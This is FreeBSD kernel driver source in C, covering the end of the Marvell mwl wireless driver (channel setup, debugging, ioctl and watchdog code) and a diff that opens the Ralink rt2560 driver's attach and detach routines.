mkpeerinfo(&pi, ni)); if (error != 0) { DPRINTF(sc, MWL_DEBUG_NODE, "%s: error %d creating sta db entry\n", __func__, error); /* XXX how to deal with error? */ } } /* * Periodically poke the firmware to age out station state * (power save queues, pending tx aggregates). */ static void mwl_agestations(void *arg) { struct mwl_softc *sc = arg; mwl_hal_setkeepalive(sc->sc_mh); if (sc->sc_ageinterval != 0) /* NB: catch dynamic changes */ callout_schedule(&sc->sc_timer, sc->sc_ageinterval*hz); } static const struct mwl_hal_channel * findhalchannel(const MWL_HAL_CHANNELINFO *ci, int ieee) { int i; for (i = 0; i < ci->nchannels; i++) { const struct mwl_hal_channel *hc = &ci->channels[i]; if (hc->ieee == ieee) return hc; } return NULL; } static int mwl_setregdomain(struct ieee80211com *ic, struct ieee80211_regdomain *rd, int nchan, struct ieee80211_channel chans[]) { struct mwl_softc *sc = ic->ic_ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; const MWL_HAL_CHANNELINFO *ci; int i; for (i = 0; i < nchan; i++) { struct ieee80211_channel *c = &chans[i]; const struct mwl_hal_channel *hc; if (IEEE80211_IS_CHAN_2GHZ(c)) { mwl_hal_getchannelinfo(mh, MWL_FREQ_BAND_2DOT4GHZ, IEEE80211_IS_CHAN_HT40(c) ? MWL_CH_40_MHz_WIDTH : MWL_CH_20_MHz_WIDTH, &ci); } else if (IEEE80211_IS_CHAN_5GHZ(c)) { mwl_hal_getchannelinfo(mh, MWL_FREQ_BAND_5GHZ, IEEE80211_IS_CHAN_HT40(c) ? MWL_CH_40_MHz_WIDTH : MWL_CH_20_MHz_WIDTH, &ci); } else { if_printf(ic->ic_ifp, "%s: channel %u freq %u/0x%x not 2.4/5GHz\n", __func__, c->ic_ieee, c->ic_freq, c->ic_flags); return EINVAL; } /* * Verify channel has cal data and cap tx power. */ hc = findhalchannel(ci, c->ic_ieee); if (hc != NULL) { if (c->ic_maxpower > 2*hc->maxTxPow) c->ic_maxpower = 2*hc->maxTxPow; goto next; } if (IEEE80211_IS_CHAN_HT40(c)) { /* * Look for the extension channel since the * hal table only has the primary channel. */ hc = findhalchannel(ci, c->ic_extieee); if (hc != NULL) { if (c->ic_maxpower > 2*hc->maxTxPow) c->ic_maxpower = 2*hc->maxTxPow; goto next; } } if_printf(ic->ic_ifp, "%s: no cal data for channel %u ext %u freq %u/0x%x\n", __func__, c->ic_ieee, c->ic_extieee, c->ic_freq, c->ic_flags); return EINVAL; next: ; } return 0; } #define IEEE80211_CHAN_HTG (IEEE80211_CHAN_HT|IEEE80211_CHAN_G) #define IEEE80211_CHAN_HTA (IEEE80211_CHAN_HT|IEEE80211_CHAN_A) static void addchan(struct ieee80211_channel *c, int freq, int flags, int ieee, int txpow) { c->ic_freq = freq; c->ic_flags = flags; c->ic_ieee = ieee; c->ic_minpower = 0; c->ic_maxpower = 2*txpow; c->ic_maxregpower = txpow; } static const struct ieee80211_channel * findchannel(const struct ieee80211_channel chans[], int nchans, int freq, int flags) { const struct ieee80211_channel *c; int i; for (i = 0; i < nchans; i++) { c = &chans[i]; if (c->ic_freq == freq && c->ic_flags == flags) return c; } return NULL; } static void addht40channels(struct ieee80211_channel chans[], int maxchans, int *nchans, const MWL_HAL_CHANNELINFO *ci, int flags) { struct ieee80211_channel *c; const struct ieee80211_channel *extc; const struct mwl_hal_channel *hc; int i; c = &chans[*nchans]; flags &= ~IEEE80211_CHAN_HT; for (i = 0; i < ci->nchannels; i++) { /* * Each entry defines an HT40 channel pair; find the * extension channel above and the insert the pair. */ hc = &ci->channels[i]; extc = findchannel(chans, *nchans, hc->freq+20, flags | IEEE80211_CHAN_HT20); if (extc != NULL) { if (*nchans >= maxchans) break; addchan(c, hc->freq, flags | IEEE80211_CHAN_HT40U, hc->ieee, hc->maxTxPow); c->ic_extieee = extc->ic_ieee; c++, (*nchans)++; if (*nchans >= maxchans) break; addchan(c, extc->ic_freq, flags | IEEE80211_CHAN_HT40D, extc->ic_ieee, hc->maxTxPow); c->ic_extieee = hc->ieee; c++, (*nchans)++; } } } static void addchannels(struct ieee80211_channel chans[], int maxchans, int *nchans, const MWL_HAL_CHANNELINFO *ci, int flags) { struct ieee80211_channel *c; int i; c = &chans[*nchans]; for (i = 0; i < ci->nchannels; i++) { const struct mwl_hal_channel *hc; hc = &ci->channels[i]; if (*nchans >= maxchans) break; addchan(c, hc->freq, flags, hc->ieee, hc->maxTxPow); c++, (*nchans)++; if (flags == IEEE80211_CHAN_G || flags == IEEE80211_CHAN_HTG) { /* g channel have a separate b-only entry */ if (*nchans >= maxchans) break; c[0] = c[-1]; c[-1].ic_flags = IEEE80211_CHAN_B; c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTG) { /* HT g channel have a separate g-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_G; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTA) { /* HT a channel have a separate a-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_A; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } } } static void getchannels(struct mwl_softc *sc, int maxchans, int *nchans, struct ieee80211_channel chans[]) { const MWL_HAL_CHANNELINFO *ci; /* * Use the channel info from the hal to craft the * channel list. Note that we pass back an unsorted * list; the caller is required to sort it for us * (if desired). */ *nchans = 0; if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_2DOT4GHZ, MWL_CH_20_MHz_WIDTH, &ci) == 0) addchannels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTG); if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_5GHZ, MWL_CH_20_MHz_WIDTH, &ci) == 0) addchannels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTA); if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_2DOT4GHZ, MWL_CH_40_MHz_WIDTH, &ci) == 0) addht40channels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTG); if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_5GHZ, MWL_CH_40_MHz_WIDTH, &ci) == 0) addht40channels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTA); } static void mwl_getradiocaps(struct ieee80211com *ic, int maxchans, int *nchans, struct ieee80211_channel chans[]) { struct mwl_softc *sc = ic->ic_ifp->if_softc; getchannels(sc, maxchans, nchans, chans); } static int mwl_getchannels(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; /* * Use the channel info from the hal to craft the * channel list for net80211. Note that we pass up * an unsorted list; net80211 will sort it for us. */ memset(ic->ic_channels, 0, sizeof(ic->ic_channels)); ic->ic_nchans = 0; getchannels(sc, IEEE80211_CHAN_MAX, &ic->ic_nchans, ic->ic_channels); ic->ic_regdomain.regdomain = SKU_DEBUG; ic->ic_regdomain.country = CTRY_DEFAULT; ic->ic_regdomain.location = 'I'; ic->ic_regdomain.isocc[0] = ' '; /* XXX? */ ic->ic_regdomain.isocc[1] = ' '; return (ic->ic_nchans == 0 ? EIO : 0); } #undef IEEE80211_CHAN_HTA #undef IEEE80211_CHAN_HTG #ifdef MWL_DEBUG static void mwl_printrxbuf(const struct mwl_rxbuf *bf, u_int ix) { const struct mwl_rxdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->Status); printf("R[%2u] (DS.V:%p DS.P:%p) NEXT:%08x DATA:%08x RC:%02x%s\n" " STAT:%02x LEN:%04x RSSI:%02x CHAN:%02x RATE:%02x QOS:%04x HT:%04x\n", ix, ds, (const struct mwl_desc *)bf->bf_daddr, le32toh(ds->pPhysNext), le32toh(ds->pPhysBuffData), ds->RxControl, ds->RxControl != EAGLE_RXD_CTRL_DRIVER_OWN ? "" : (status & EAGLE_RXD_STATUS_OK) ? " *" : " !", ds->Status, le16toh(ds->PktLen), ds->RSSI, ds->Channel, ds->Rate, le16toh(ds->QosCtrl), le16toh(ds->HtSig2)); } static void mwl_printtxbuf(const struct mwl_txbuf *bf, u_int qnum, u_int ix) { const struct mwl_txdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->Status); printf("Q%u[%3u]", qnum, ix); printf(" (DS.V:%p DS.P:%p)\n", ds, (const struct mwl_txdesc *)bf->bf_daddr); printf(" NEXT:%08x DATA:%08x LEN:%04x STAT:%08x%s\n", le32toh(ds->pPhysNext), le32toh(ds->PktPtr), le16toh(ds->PktLen), status, status & EAGLE_TXD_STATUS_USED ? "" : (status & 3) != 0 ? " *" : " !"); printf(" RATE:%02x PRI:%x QOS:%04x SAP:%08x FORMAT:%04x\n", ds->DataRate, ds->TxPriority, le16toh(ds->QosCtrl), le32toh(ds->SapPktInfo), le16toh(ds->Format)); #if MWL_TXDESC > 1 printf(" MULTIFRAMES:%u LEN:%04x %04x %04x %04x %04x %04x\n" , le32toh(ds->multiframes) , le16toh(ds->PktLenArray[0]), le16toh(ds->PktLenArray[1]) , le16toh(ds->PktLenArray[2]), le16toh(ds->PktLenArray[3]) , le16toh(ds->PktLenArray[4]), le16toh(ds->PktLenArray[5]) ); printf(" DATA:%08x %08x %08x %08x %08x %08x\n" , le32toh(ds->PktPtrArray[0]), le32toh(ds->PktPtrArray[1]) , le32toh(ds->PktPtrArray[2]), le32toh(ds->PktPtrArray[3]) , le32toh(ds->PktPtrArray[4]), le32toh(ds->PktPtrArray[5]) ); #endif #if 0 { const uint8_t *cp = (const uint8_t *) ds; int i; for (i = 0; i < sizeof(struct mwl_txdesc); i++) { printf("%02x ", cp[i]); if (((i+1) % 16) == 0) printf("\n"); } printf("\n"); } #endif } #endif /* MWL_DEBUG */ #if 0 static void mwl_txq_dump(struct mwl_txq *txq) { struct mwl_txbuf *bf; int i = 0; MWL_TXQ_LOCK(txq); STAILQ_FOREACH(bf, &txq->active, bf_list) { struct mwl_txdesc *ds = bf->bf_desc; MWL_TXDESC_SYNC(txq, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); #ifdef MWL_DEBUG mwl_printtxbuf(bf, txq->qnum, i); #endif i++; } MWL_TXQ_UNLOCK(txq); } #endif static void mwl_watchdog(void *arg) { struct mwl_softc *sc; struct ifnet *ifp; sc = arg; callout_reset(&sc->sc_watchdog, hz, mwl_watchdog, sc); if (sc->sc_tx_timer == 0 || --sc->sc_tx_timer > 0) return; ifp = sc->sc_ifp; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) && !sc->sc_invalid) { if (mwl_hal_setkeepalive(sc->sc_mh)) if_printf(ifp, "transmit timeout (firmware hung?)\n"); else if_printf(ifp, "transmit timeout\n"); #if 0 mwl_reset(ifp); mwl_txq_dump(&sc->sc_txq[0]);/*XXX*/ #endif ifp->if_oerrors++; sc->sc_stats.mst_watchdog++; } } #ifdef MWL_DIAGAPI /* * Diagnostic interface to the HAL. This is used by various * tools to do things like retrieve register contents for * debugging. The mechanism is intentionally opaque so that * it can change frequently w/o concern for compatiblity. */ static int mwl_ioctl_diag(struct mwl_softc *sc, struct mwl_diag *md) { struct mwl_hal *mh = sc->sc_mh; u_int id = md->md_id & MWL_DIAG_ID; void *indata = NULL; void *outdata = NULL; u_int32_t insize = md->md_in_size; u_int32_t outsize = md->md_out_size; int error = 0; if (md->md_id & MWL_DIAG_IN) { /* * Copy in data. */ indata = malloc(insize, M_TEMP, M_NOWAIT); if (indata == NULL) { error = ENOMEM; goto bad; } error = copyin(md->md_in_data, indata, insize); if (error) goto bad; } if (md->md_id & MWL_DIAG_DYN) { /* * Allocate a buffer for the results (otherwise the HAL * returns a pointer to a buffer where we can read the * results). Note that we depend on the HAL leaving this * pointer for us to use below in reclaiming the buffer; * may want to be more defensive. */ outdata = malloc(outsize, M_TEMP, M_NOWAIT); if (outdata == NULL) { error = ENOMEM; goto bad; } } if (mwl_hal_getdiagstate(mh, id, indata, insize, &outdata, &outsize)) { if (outsize < md->md_out_size) md->md_out_size = outsize; if (outdata != NULL) error = copyout(outdata, md->md_out_data, md->md_out_size); } else { error = EINVAL; } bad: if ((md->md_id & MWL_DIAG_IN) && indata != NULL) free(indata, M_TEMP); if ((md->md_id & MWL_DIAG_DYN) && outdata != NULL) free(outdata, M_TEMP); return error; } static int mwl_ioctl_reset(struct mwl_softc *sc, struct mwl_diag *md) { struct mwl_hal *mh = sc->sc_mh; int error; MWL_LOCK_ASSERT(sc); if (md->md_id == 0 && mwl_hal_fwload(mh, NULL) != 0) { device_printf(sc->sc_dev, "unable to load firmware\n"); return EIO; } if (mwl_hal_gethwspecs(mh, &sc->sc_hwspecs) != 0) { device_printf(sc->sc_dev, "unable to fetch h/w specs\n"); return EIO; } error = mwl_setupdma(sc); if (error != 0) { /* NB: mwl_setupdma prints a msg */ return error; } /* * Reset tx/rx data structures; after reload we must * re-start the driver's notion of the next xmit/recv. */ mwl_draintxq(sc); /* clear pending frames */ mwl_resettxq(sc); /* rebuild tx q lists */ sc->sc_rxnext = NULL; /* force rx to start at the list head */ return 0; } #endif /* MWL_DIAGAPI */ static int mwl_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define IS_RUNNING(ifp) \ ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)) struct mwl_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *)data; int error = 0, startall; switch (cmd) { case SIOCSIFFLAGS: MWL_LOCK(sc); startall = 0; if (IS_RUNNING(ifp)) { /* * To avoid rescanning another access point, * do not call mwl_init() here. Instead, * only reflect promisc mode settings. */ mwl_mode_init(sc); } else if (ifp->if_flags & IFF_UP) { /* * Beware of being called during attach/detach * to reset promiscuous mode. In that case we * will still be marked UP but not RUNNING. * However trying to re-init the interface * is the wrong thing to do as we've already * torn down much of our state. There's * probably a better way to deal with this. */ if (!sc->sc_invalid) { mwl_init_locked(sc); /* XXX lose error */ startall = 1; } } else mwl_stop_locked(ifp, 1); MWL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGMVSTATS: mwl_hal_gethwstats(sc->sc_mh, &sc->sc_stats.hw_stats); /* NB: embed these numbers to get a consistent view */ sc->sc_stats.mst_tx_packets = ifp->if_opackets; sc->sc_stats.mst_rx_packets = ifp->if_ipackets; /* * NB: Drop the softc lock in case of a page fault; * we'll accept any potential inconsisentcy in the * statistics. The alternative is to copy the data * to a local structure. */ return copyout(&sc->sc_stats, ifr->ifr_data, sizeof (sc->sc_stats)); #ifdef MWL_DIAGAPI case SIOCGMVDIAG: /* XXX check privs */ return mwl_ioctl_diag(sc, (struct mwl_diag *) ifr); case SIOCGMVRESET: /* XXX check privs */ MWL_LOCK(sc); error = mwl_ioctl_reset(sc,(struct mwl_diag *) ifr); MWL_UNLOCK(sc); break; #endif /* MWL_DIAGAPI */ case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; #undef IS_RUNNING } #ifdef MWL_DEBUG static int mwl_sysctl_debug(SYSCTL_HANDLER_ARGS) { struct mwl_softc *sc = arg1; int debug, error; debug = sc->sc_debug | (mwl_hal_getdebug(sc->sc_mh) << 24); error = sysctl_handle_int(oidp, &debug, 0, req); if (error || !req->newptr) return error; mwl_hal_setdebug(sc->sc_mh, debug >> 24); sc->sc_debug = debug & 0x00ffffff; return 0; } #endif /* MWL_DEBUG */ static void mwl_sysctlattach(struct mwl_softc *sc) { #ifdef MWL_DEBUG struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); sc->sc_debug = mwl_debug; SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "debug", CTLTYPE_INT | CTLFLAG_RW, sc, 0, mwl_sysctl_debug, "I", "control debugging printfs"); #endif } /* * Announce various information on device/driver attach. */ static void mwl_announce(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; if_printf(ifp, "Rev A%d hardware, v%d.%d.%d.%d firmware (regioncode %d)\n", sc->sc_hwspecs.hwVersion, (sc->sc_hwspecs.fwReleaseNumber>>24) & 0xff, (sc->sc_hwspecs.fwReleaseNumber>>16) & 0xff, (sc->sc_hwspecs.fwReleaseNumber>>8) & 0xff, (sc->sc_hwspecs.fwReleaseNumber>>0) & 0xff, sc->sc_hwspecs.regionCode); sc->sc_fwrelease = sc->sc_hwspecs.fwReleaseNumber; if (bootverbose) { int i; for (i = 0; i <= WME_AC_VO; i++) { struct mwl_txq *txq = sc->sc_ac2q[i]; if_printf(ifp, "Use hw queue %u for %s traffic\n", txq->qnum, ieee80211_wme_acnames[i]); } } if (bootverbose || mwl_rxdesc != MWL_RXDESC) if_printf(ifp, "using %u rx descriptors\n", mwl_rxdesc); if (bootverbose || mwl_rxbuf != MWL_RXBUF) if_printf(ifp, "using %u rx buffers\n", mwl_rxbuf); if (bootverbose || mwl_txbuf != MWL_TXBUF) if_printf(ifp, "using %u tx buffers\n", mwl_txbuf); if (bootverbose && mwl_hal_ismbsscapable(sc->sc_mh)) if_printf(ifp, "multi-bss support\n"); #ifdef MWL_TX_NODROP if (bootverbose) if_printf(ifp, "no tx drop\n"); #endif } diff --git a/sys/dev/ral/rt2560.c b/sys/dev/ral/rt2560.c index 846d1797e38d..475544d23d6d 100644 --- a/sys/dev/ral/rt2560.c +++ b/sys/dev/ral/rt2560.c @@ -1,2826 +1,2826 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2005, 2006 * Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2560 chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define RT2560_RSSI(sc, rssi) \ ((rssi) > (RT2560_NOISE_FLOOR + (sc)->rssi_corr) ? \ ((rssi) - RT2560_NOISE_FLOOR - (sc)->rssi_corr) : 0) #define RAL_DEBUG #ifdef RAL_DEBUG #define DPRINTF(sc, fmt, ...) do { \ if (sc->sc_debug > 0) \ printf(fmt, __VA_ARGS__); \ } while (0) #define DPRINTFN(sc, n, fmt, ...) do { \ if (sc->sc_debug >= (n)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, fmt, ...) #define DPRINTFN(sc, n, fmt, ...) #endif static struct ieee80211vap *rt2560_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rt2560_vap_delete(struct ieee80211vap *); static void rt2560_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int rt2560_alloc_tx_ring(struct rt2560_softc *, struct rt2560_tx_ring *, int); static void rt2560_reset_tx_ring(struct rt2560_softc *, struct rt2560_tx_ring *); static void rt2560_free_tx_ring(struct rt2560_softc *, struct rt2560_tx_ring *); static int rt2560_alloc_rx_ring(struct rt2560_softc *, struct rt2560_rx_ring *, int); static void rt2560_reset_rx_ring(struct rt2560_softc *, struct rt2560_rx_ring *); static void rt2560_free_rx_ring(struct rt2560_softc *, struct rt2560_rx_ring *); static int rt2560_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t rt2560_eeprom_read(struct rt2560_softc *, uint8_t); static void rt2560_encryption_intr(struct rt2560_softc *); static void rt2560_tx_intr(struct rt2560_softc *); static void rt2560_prio_intr(struct rt2560_softc *); static void rt2560_decryption_intr(struct rt2560_softc *); static void rt2560_rx_intr(struct rt2560_softc *); static void rt2560_beacon_update(struct ieee80211vap *, int item); static void rt2560_beacon_expire(struct rt2560_softc *); static void rt2560_wakeup_expire(struct rt2560_softc *); static void rt2560_scan_start(struct ieee80211com *); static void rt2560_scan_end(struct ieee80211com *); static void rt2560_set_channel(struct ieee80211com *); static void rt2560_setup_tx_desc(struct rt2560_softc *, struct rt2560_tx_desc *, uint32_t, int, int, int, bus_addr_t); static int rt2560_tx_bcn(struct rt2560_softc *, struct mbuf *, struct ieee80211_node *); static int rt2560_tx_mgt(struct rt2560_softc *, struct mbuf *, struct ieee80211_node *); static int rt2560_tx_data(struct rt2560_softc *, struct mbuf *, struct ieee80211_node *); static void rt2560_start_locked(struct ifnet *); static void rt2560_start(struct ifnet *); static void rt2560_watchdog(void *); static int rt2560_ioctl(struct ifnet *, u_long, caddr_t); static void rt2560_bbp_write(struct rt2560_softc *, uint8_t, uint8_t); static uint8_t rt2560_bbp_read(struct rt2560_softc *, uint8_t); static void rt2560_rf_write(struct rt2560_softc *, uint8_t, uint32_t); static void rt2560_set_chan(struct rt2560_softc *, struct ieee80211_channel *); #if 0 static void rt2560_disable_rf_tune(struct rt2560_softc *); #endif static void rt2560_enable_tsf_sync(struct rt2560_softc *); static void rt2560_enable_tsf(struct rt2560_softc *); static void rt2560_update_plcp(struct rt2560_softc *); static void rt2560_update_slot(struct ifnet *); static void rt2560_set_basicrates(struct rt2560_softc *, const struct ieee80211_rateset *); static void rt2560_update_led(struct rt2560_softc *, int, int); static void rt2560_set_bssid(struct rt2560_softc *, const uint8_t *); static void rt2560_set_macaddr(struct rt2560_softc *, uint8_t *); static void rt2560_get_macaddr(struct rt2560_softc *, uint8_t *); static void rt2560_update_promisc(struct ifnet *); static const char *rt2560_get_rf(int); static void rt2560_read_config(struct rt2560_softc *); static int rt2560_bbp_init(struct rt2560_softc *); static void rt2560_set_txantenna(struct rt2560_softc *, int); static void rt2560_set_rxantenna(struct rt2560_softc *, int); static void rt2560_init_locked(struct rt2560_softc *); static void rt2560_init(void *); static void rt2560_stop_locked(struct rt2560_softc *); static int rt2560_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static const struct { uint32_t reg; uint32_t val; } rt2560_def_mac[] = { RT2560_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2560_def_bbp[] = { RT2560_DEF_BBP }; static const uint32_t rt2560_rf2522_r2[] = RT2560_RF2522_R2; static const uint32_t rt2560_rf2523_r2[] = RT2560_RF2523_R2; static const uint32_t rt2560_rf2524_r2[] = RT2560_RF2524_R2; static const uint32_t rt2560_rf2525_r2[] = RT2560_RF2525_R2; static const uint32_t rt2560_rf2525_hi_r2[] = RT2560_RF2525_HI_R2; static const uint32_t rt2560_rf2525e_r2[] = RT2560_RF2525E_R2; static const uint32_t rt2560_rf2526_r2[] = RT2560_RF2526_R2; static const uint32_t rt2560_rf2526_hi_r2[] = RT2560_RF2526_HI_R2; static const struct { uint8_t chan; uint32_t r1, r2, r4; } rt2560_rf5222[] = { RT2560_RF5222 }; int rt2560_attach(device_t dev, int id) { struct rt2560_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; int error; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); /* retrieve RT2560 rev. no */ sc->asic_rev = RAL_READ(sc, RT2560_CSR0); /* retrieve RF rev. no and various other things from EEPROM */ rt2560_read_config(sc); device_printf(dev, "MAC/BBP RT2560 (rev 0x%02x), RF %s\n", sc->asic_rev, rt2560_get_rf(sc->rf_rev)); /* * Allocate Tx and Rx rings. */ error = rt2560_alloc_tx_ring(sc, &sc->txq, RT2560_TX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx ring\n"); goto fail1; } error = rt2560_alloc_tx_ring(sc, &sc->atimq, RT2560_ATIM_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate ATIM ring\n"); goto fail2; } error = rt2560_alloc_tx_ring(sc, &sc->prioq, RT2560_PRIO_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Prio ring\n"); goto fail3; } error = rt2560_alloc_tx_ring(sc, &sc->bcnq, RT2560_BEACON_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Beacon ring\n"); goto fail4; } error = rt2560_alloc_rx_ring(sc, &sc->rxq, RT2560_RX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx ring\n"); goto fail5; } ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto fail6; } ic = ifp->if_l2com; /* retrieve MAC address */ rt2560_get_macaddr(sc, macaddr); ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rt2560_init; ifp->if_ioctl = rt2560_ioctl; ifp->if_start = rt2560_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_WDS /* 4-address traffic works */ | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ #ifdef notyet | IEEE80211_C_TXFRAG /* handle tx frags */ #endif ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2560_RF_5222) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); ic->ic_raw_xmit = rt2560_raw_xmit; ic->ic_updateslot = rt2560_update_slot; ic->ic_update_promisc = rt2560_update_promisc; ic->ic_scan_start = rt2560_scan_start; ic->ic_scan_end = rt2560_scan_end; ic->ic_set_channel = rt2560_set_channel; ic->ic_vap_create = rt2560_vap_create; ic->ic_vap_delete = rt2560_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2560_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2560_RX_RADIOTAP_PRESENT); /* * Add a few sysctl knobs. */ #ifdef RAL_DEBUG SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "debug msgs"); #endif SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "txantenna", CTLFLAG_RW, &sc->tx_ant, 0, "tx antenna (0=auto)"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "rxantenna", CTLFLAG_RW, &sc->rx_ant, 0, "rx antenna (0=auto)"); if (bootverbose) ieee80211_announce(ic); return 0; fail6: rt2560_free_rx_ring(sc, &sc->rxq); fail5: rt2560_free_tx_ring(sc, &sc->bcnq); fail4: rt2560_free_tx_ring(sc, &sc->prioq); fail3: rt2560_free_tx_ring(sc, &sc->atimq); fail2: rt2560_free_tx_ring(sc, &sc->txq); fail1: mtx_destroy(&sc->sc_mtx); return ENXIO; } int rt2560_detach(void *xsc) { struct rt2560_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; rt2560_stop(sc); ieee80211_ifdetach(ic); rt2560_free_tx_ring(sc, &sc->txq); rt2560_free_tx_ring(sc, &sc->atimq); rt2560_free_tx_ring(sc, &sc->prioq); rt2560_free_tx_ring(sc, &sc->bcnq); rt2560_free_rx_ring(sc, &sc->rxq); if_free(ifp); mtx_destroy(&sc->sc_mtx); return 0; } static struct ieee80211vap * rt2560_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_vap *rvp; struct ieee80211vap *vap; 